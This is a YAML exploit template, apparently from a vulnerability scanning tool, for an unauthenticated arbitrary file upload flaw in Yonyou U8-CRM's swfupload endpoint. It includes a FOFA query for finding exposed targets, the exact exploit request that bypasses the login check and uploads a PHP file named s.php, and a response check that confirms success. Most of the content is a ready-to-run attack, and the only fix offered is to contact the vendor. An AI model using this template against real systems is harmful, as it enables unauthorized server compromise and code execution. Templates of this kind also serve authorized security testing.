product: 用友U8-CRM
vName: 用友U8-CRM swfupload 任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 用友U8-CRM客户关系管理系统 swfupload 文件存在任意文件上传漏洞，未经身份验证的攻击者通过漏洞上传恶意后门文件，执行任意代码，从而获取到服务器权限。
version: ''
note: ''
search:
  FOFA: app="用友U8CRM"
protocol: http
link: https://blog.csdn.net/qq_39894062/article/details/137991087
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /ajax/swfupload.php?DontCheckLogin=1&vname=file
      file:
        file:
          - 's.php'
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/octet-stream
      dataJson:
        upload: upload
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - success
              - 'true'
              - 's.php'
            logic: and